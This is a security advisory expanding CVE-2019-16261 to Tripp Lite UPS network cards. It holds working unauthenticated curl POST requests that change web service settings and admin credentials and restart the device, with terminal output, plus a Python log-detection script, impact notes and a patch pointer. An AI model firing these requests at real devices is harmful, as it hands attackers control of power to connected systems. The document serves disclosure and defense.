Author: Lucas Lalumiere
Contact: lucas.lalum@gmail.com
Date: 2025-3-19
Vendor: Tripp Lite
Product: SU750XL UPS
Firmware: 12.04.0052
CVE Reference: CVE-2019-16261
- Tripp Lite PDUs (e.g., PDUMH15AT)
- Tripp Lite UPSs (e.g., SU750XL) NEW
CVE-2019-16261 describes a critical vulnerability in the Tripp Lite PDUMH15AT with firmware 12.04.0053, allowing unauthenticated users to send POST requests to the /Forms/ directory to:
- Change admin or manager passwords
- Shut off power to an outlet
- Disable/enable services
Through my own experimentation, I have discovered that this vulnerability is also effective on Tripp Lite UPS systems, including my Tripp Lite SU750XL, and applies to firmware 12.04.0052. This suggests the issue extends beyond just PDUs, as mentioned in the CVE, to the network cards equipped in Tripp Lite PDUs and UPSs (like my SNMPWEBCARD55) with vulnerable firmware versions 12.04.0053 and below.
These curl commands, similar to those provided originally by Jim Becher's blog, are among those I've tested on the SU750XL.
curl -X POST -d "netweb_access=00000001&nethttp_access=00000001&nethttp_port=80&nethttps_access=00000000&nethttps_port=443&savechanges=Save+Changes" http://[DEVICE_IP]/Forms/network_web_1
curl -X POST -d "startreset=Restart+PowerAlert" http://[DEVICE_IP]/Forms/requestreset_1
Result (PowerAlert terminal):
System settings were changed.
Initiating system shutdown procedure ... complete.
The system is restarting now.
...
SERVICES:
HTTP is enabled on port 80
HTTPS is disabled on port 443
SSH is enabled on port 22
TELNET is enabled on port 23
FTP is enabled on port 21
SYSLOG is enabled
curl -X POST -d "securityadu=newadmin&securityad1=admin&securityad2=admin&savechanges=Save+Changes" http://[DEVICE_IP]/Forms/system_security_1
curl -X POST -d "startreset=Restart+PowerAlert" http://[DEVICE_IP]/Forms/requestreset_1
Result (PowerAlert terminal):
System settings were changed.
Initiating system shutdown procedure ... complete.
The system is restarting now.
...
Login: newadmin
Password: *****
Logged in as user newadmin
$ _
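For defenders, both request sequences above (a settings POST followed by a POST to /Forms/requestreset_1) can be hunted in HTTP traffic logs. The following detection logic is an added example, not part of the original advisory: the JSON log format, the allowlisted management host and the five-minute window are assumptions, and the sample records are constructed.

```python
import json
from datetime import datetime, timedelta

# Endpoints taken from the curl commands in this advisory.
FORM_LABELS = {
    "/Forms/network_web_1": "web service settings change",
    "/Forms/system_security_1": "admin credential change",
    "/Forms/requestreset_1": "PowerAlert restart request",
}
RESET = "/Forms/requestreset_1"
ADMIN_SOURCES = {"192.0.2.10"}   # assumption: approved management hosts
WINDOW = timedelta(minutes=5)    # assumption: change-then-restart window

# Constructed sample records (JSON lines from a hypothetical HTTP sensor).
SAMPLE_LOG = """
{"ts": "2025-03-19T10:00:00", "src": "192.0.2.10", "dst": "192.0.2.50", "method": "POST", "uri": "/Forms/network_web_1"}
{"ts": "2025-03-19T10:01:00", "src": "192.0.2.77", "dst": "192.0.2.50", "method": "GET", "uri": "/index.html"}
{"ts": "2025-03-19T10:02:00", "src": "192.0.2.77", "dst": "192.0.2.50", "method": "POST", "uri": "/Forms/system_security_1"}
{"ts": "2025-03-19T10:02:30", "src": "192.0.2.77", "dst": "192.0.2.50", "method": "POST", "uri": "/Forms/requestreset_1"}
{"ts": "2025-03-19T11:00:00", "src": "192.0.2.88", "dst": "192.0.2.51", "method": "POST", "uri": "/Forms/requestreset_1"}
"""

def find_alerts(log_text, admin_sources=ADMIN_SOURCES, window=WINDOW):
    """Flag POSTs to /Forms/ from hosts outside the management allowlist."""
    alerts, last_change = [], {}   # last_change: (src, dst) -> time of last settings POST
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        path = rec["uri"].split("?", 1)[0]
        if rec["method"].upper() != "POST" or not path.startswith("/Forms/"):
            continue
        if rec["src"] in admin_sources:
            continue
        ts, key = datetime.fromisoformat(rec["ts"]), (rec["src"], rec["dst"])
        severity = "high" if path == "/Forms/system_security_1" else "medium"
        if path == RESET:
            changed = last_change.get(key)
            # A restart right after a settings POST matches the sequence shown above.
            if changed is not None and ts - changed <= window:
                severity = "high"
        else:
            last_change[key] = ts
        alerts.append({"ts": rec["ts"], "src": rec["src"], "dst": rec["dst"],
                       "event": FORM_LABELS.get(path, "other /Forms/ POST"),
                       "severity": severity})
    return alerts

if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_LOG):
        print(alert)
```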
- High Availability Impact: Attackers can remotely control power functions, affecting critical systems connected to the PDU or UPS.
- High Confidentiality Impact: Attackers can obtain admin access to any of the device's information by changing credentials.
- High Integrity Impact: Attackers can modify any configuration, if not through the POST requests directly, then by using the changed admin credentials.
This vulnerability has already been patched in newer network card firmware versions and acknowledged by Eaton. It was previously reported in CVE-2019-16261 but was only attributed to Tripp Lite PDUMH15AT PDUs.
Upgrade webcard firmware to the newest version. You can find the download here:
- Original discovery: https://blog.korelogic.com/blog/2019/08/19/unpatched_fringe_infrastructure_bits
- CVE-2019-16261: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16261
- Jim Becher, 2019-08-19
This disclosure is being submitted to expand upon the original CVE report, adding additional affected products and detail. My find confirms that both Tripp Lite UPS and PDU devices equipped with optional network cards (e.g., SNMPWEBCARD55) with firmware 12.04.0053 and 12.04.0052 are vulnerable.